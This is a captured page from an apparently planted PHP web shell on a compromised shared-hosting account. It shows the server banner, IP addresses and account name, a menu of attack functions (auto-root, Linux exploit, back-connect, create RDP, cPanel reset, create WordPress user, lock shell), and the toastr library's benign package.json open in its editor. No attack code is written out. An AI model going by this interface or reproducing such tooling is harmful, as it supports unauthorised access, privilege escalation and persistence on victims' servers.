Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.17
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
node_modules /
toastr /
[ HOME SHELL ]
Name
Size
Permission
Action
build
[ DIR ]
dr-xr-xr-x
nuget
[ DIR ]
dr-xr-xr-x
tests
[ DIR ]
dr-xr-xr-x
.gitattributes
425
B
-rw-r--r--
.jscsrc
2.28
KB
-rw-r--r--
.jshintrc
1.19
KB
-rw-r--r--
.npmignore
654
B
-rw-r--r--
.travis.yml
207
B
-rw-r--r--
CHANGELOG.md
5.75
KB
-rw-r--r--
README.md
7.15
KB
-rw-r--r--
demo.html
15.35
KB
-rw-r--r--
gulpfile.js
4.3
KB
-rw-r--r--
karma.conf.js
2.02
KB
-rw-r--r--
package-lock.json
239.28
KB
-rw-r--r--
package.json
1.75
KB
-rw-r--r--
release checklist.md
626
B
-rw-r--r--
toastr-icon.png
24.91
KB
-rw-r--r--
toastr.js
17.31
KB
-rw-r--r--
toastr.less
7.18
KB
-rw-r--r--
toastr.scss
6.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "toastr", "filename": "build/toastr.min.js", "main": "toastr.js", "style": "build/toastr.min.css", "version": "2.1.4", "description": "ToastrJS is a JavaScript library for Gnome / Growl type non-blocking notifications. jQuery is required. The goal is to create a simple core library that can be customized and extended.", "homepage": "http://www.toastrjs.com", "keywords": [ "Toastr", "ToastrJS", "toastr.js" ], "maintainers": [ { "name": "John Papa", "web": "http://www.johnpapa.net", "twitter": "@john_papa" }, { "name": "Tim Ferrell", "web": "https://twitter.com/ferrell_tim", "twitter": "@ferrell_tim" } ], "repository": { "type": "git", "url": "git://github.com/CodeSeven/toastr.git" }, "bugs": "http://stackoverflow.com/questions/tagged/toastr", "licenses": [ { "type": "MIT", "url": "http://www.opensource.org/licenses/mit-license.php" } ], "dependencies": { "jquery": ">=1.12.0" }, "devDependencies": { "gulp": "^3.8.10", "gulp-bytediff": "^0.2.0", "gulp-jscs": "^1.3.0", "gulp-jshint": "^1.9.0", "gulp-less": "^3.0.3", "gulp-load-plugins": "^0.7.1", "gulp-load-utils": "0.0.4", "gulp-minify-css": "^0.3.11", "gulp-rename": "^1.2.0", "gulp-sourcemaps": "^1.2.8", "gulp-task-listing": "^0.3.0", "gulp-uglify": "^1.0.1", "gulp-util": "^3.0.1", "jquery": "^2.1.1", "jshint-stylish": "^1.0.0", "karma": "^0.12.25", "karma-coverage": "^0.2.6", "karma-phantomjs-launcher": "^0.1.4", "karma-qunit": "^0.1.3", "merge-stream": "^0.1.6", "phantomjs": "^1.9.7-15", "plato": "^1.2.2", "qunitjs": "~1.14.0" }, "scripts": { "test": "gulp test" } }
Close